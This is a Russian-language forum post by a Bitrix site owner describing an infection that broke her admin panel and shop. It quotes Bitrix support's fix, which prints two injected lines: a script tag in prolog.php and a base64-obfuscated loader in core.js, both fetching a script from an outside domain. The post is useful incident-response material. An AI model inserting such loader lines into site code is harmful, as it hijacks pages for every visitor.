Добрый день. Я нашла эти две ссылки и удалили их вручную, через 2-3 недели, ссылки опять появились - удалила. А вчера, открываю сайт, в админку попасть не могу, куда не жму, все не кликабельно. На сайте так же, товар есть, его видно, но переключения между вкладками нет, картинки тоже не кликабельны, товар в корзину не кладется. Обратилась в поддержку битрикс. Может кому-то поможет, специалист мне удалил эти две ссылки (всем уже известные). Ниже как решалась проблема, может кому-то пригодится.
У вас в файле /bitrix/modules/main/include/prolog.php были добавлены строки вызывающие скрипт:
//
\n<sc ript src="[URL=https://storejscdn.pw/jqueryui.js></sc]https://storejscdn.pw/jqueryui.js"></sc[/URL] (?) ript>;
В файл /bitrix/js/main/core/core.js была добавлена строка:
\bs=document.createElement(`script`);s.src=atob(`aHR0cHM6Ly9zdG9yZWpzY2RuLnB3L2pxdWVyeXVpLmpz`);document.head.appendChild(s);
Сайт заработал корректно только после ручного удаления вредоносных строк.
А также удалил вам вирусный файл /bitrix/components/bitrix/main.file.input/main.php. Из-за которого возникла вся эта ситуация.19:20
То есть из-за этого файла в /bitrix/js/main/core/core.js и в /bitrix/modules/main/include/prolog.php добавились лишние строки.
